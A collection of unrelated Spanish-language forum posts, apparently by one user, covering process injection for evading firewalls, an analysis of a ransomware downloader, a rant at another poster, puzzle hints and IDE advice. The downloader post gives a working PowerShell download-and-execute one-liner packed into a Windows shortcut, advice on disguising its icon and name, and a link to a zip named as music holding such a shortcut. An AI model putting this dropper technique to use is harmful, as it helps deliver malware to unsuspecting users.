A grendes rasgos, para ocultar un malware y hacerlo "invisible" al firewall se usa la inyección de procesos, básicamente coges un proceso del equipo que sí tiene acceso a internet (tiene permiso por el firewall) e inyectas el payload del malware en dicho proceso.

Pero como te han dicho ya, estás empezando la casa por el tejado, antes te toca estudiar temas más básicos para finalmente empezar con la inyección de código.

Claro!

Hola

Hace tiempo que no me paso por mi sección del foro favorita para compartir nuevas ideas... Recientemente ha llegado a mis manos un virus de tipo ramsonware oculto en un fichero zip (por e-mail), curiosamente mi antivirus no detectó la amenaza, así que me puse a destriparlo en mi VM.

El funcionamiento es muy básico, tras ejecutar el fichero que hay en el ZIP, se ejecuta un ejecutable EXE y se inicia la infección de los ficheros. Hasta aquí todo normal, excepto que el fichero ZIP ocupaba 1,26Kb (descomprimido eran 2Kb…) ¿Cómo podía un fichero de 2Kb cifrar de forma eficiente todos los fichero del disco? La respuesta era fácil, ese fichero de 2Kb no era el ramsonware, sino un pequeño fichero (downloader) que se descargaba una copia del EXE (ramsonware) desde internet y luego lo ejecutaba. Todo ello en un ficherito de 2Kb.

Tras mi análisis pude ver el truco, un simple acceso directo al proceso powershell.exe de Windows y una pequeña línea de código añadida como parámetro del propio acceso directo. Sublime!

El código para descargar y ejecutar un fichero desde internet en PowerShell sería el siguiente:

$c=$env:userprofile+'\tmp.exe';
(New-Object System.Net.WebClient).Downloadfile('https://live.sysinternals.com/procexp.exe',$c);
Start-Process $c

La primera línea define una variable $c con el valor de “C:\Users\usuario_actual\tmp.exe”
La segunda línea crea un nuevo objeto del tipo WebClient y llama a su función DownloadFile, indicando la ruta y el destino ($c)
La tercera línea ejecuta el fichero descargado $c usando Start-Process.

Todo ese código se puede escribir en una sola línea y enviarlo como argumento directamente al proceso powershell.exe usando un acceso directo:





Editando el icono y el nombre podremos disimular el downloader todavía más. Quedando un único fichero de apenas 2Kb completamente funcional.

Os dejo un ejemplo para que entendáis el proceso, es completamente inofensivo. Este acceso directo os descargará y ejecutará el programa ProcessExplorer.exe desde internet

http://www.mediafire.com/download/kj3mtepo8h6zypu/musica.zip

Saludos!!

Madre de dios bendito... te has parado a leer tus mensajes antes de publicarlos? Creo que no se puede ser más pedante...

La gente que alardea de saber programar en 3, 5, 12 o 90 lenguajes de programación quedan retratados en lo MUCHO que les falta para convertirse en programadores reales. Un buen programador sabe programar en cualquier lenguaje, pues lo único que cambia es la sintaxis (teniendo en cuenta que prácticamente todos los lenguajes comparten similitudes en cuando a sintaxis).

He tenido la suerte de conocer a grandes programadores, gente con la que he trabajado, se presenta un proyecto heredado de un nuevo cliente y son capaces de continuar el código en menos de 6 horas (código escrito por otra empresa en un lenguaje que jamás han utilizado). Cuando sabes programar te da igual el lenguaje, venir a un foro y decir que sabes programar en "C y sus derivados (C#,C++. Ect), Php, Python, Java, HTML, Xml, Asp, Ensambler,  javascript, Lisp, Lua, Clojure, R, Haskell, VB.net, VB, Foxpro, Ruby On Rails ect..." te deja en muy mal lugar. Además has escrito "C y sus derivados (C#,C++. Ect)" cuando esos lenguajes no son derivados de nada.. se llaman C C++ y C# porque comparten sintaxis, pero los 3 lenguajes son suficientemente diferentes como para que CUALQUIER programador que se precie no los catalogue como "derivados", además no sabes ni escribir correctamente Ensamblador. Has puesto HTML como lenguaje de programación... en fin. Éste punto ha quedado bastante claro creo yo.

Dices tener conocimientos expertos en TCP/IP? Me puedes explicar exactamente que conocimientos expertos necesitas para entender un protocolo de comunicaciones? Te leíste 2 veces los RFC de TCP y ya se te otorga el rango de "conocedor experto" sobre dicho protocolo? De verdad, no termino de entenderte.

Luego mencionas cosas como Batch, bindear... wtf?

En fin, no te calientes, voy a bloquear éste hilo. Pecas de pedantería mientras dejas leer entre líneas lo desinformado que estás sobre la materia.

Que te vaya todo muy bien en la vida, te deseo mucha suerte (la vas a necesitar). Adiós

Como lo llevas? Sigues atascado?

Me alegra que hayas podido descifrar el enigma de Link Es curioso como he logrado esconder ese mensaje, eh? jeje.
Ahora estás con el árbol. Veamos que tal te las apañas para solventar esa prueba. Tu deducción de los pecados capitales es correcta.

Por cierto, os está gustando el reto? Es muy largo?

Estáis muy cerca... La clave es en entender el mensaje del enigma.

en su interior hallarás la respuesta...



EDIT IMPORTANTE QUE NO TIENE QUE VER CON EL ACERTIJO DE LINK: Más adelante os encontraréis la imagen de un apóstol. Esa imagen representa que es el apóstol Job, lo que pasa es que cometí un error seleccionando la foto. Vosotros no os centréis en la imagen "real" del apóstol, en su lugar imaginaos que esa imagen es de Job

Suerte!

PyCharm es de lejos el mejor IDE que puedas utilizar para Python. Ágil, similar a VS y con un excelente debugger.

Mira el codigo de la web...


uy uy uy, estás muy cerca

Que id? dime el id y lo compruebo.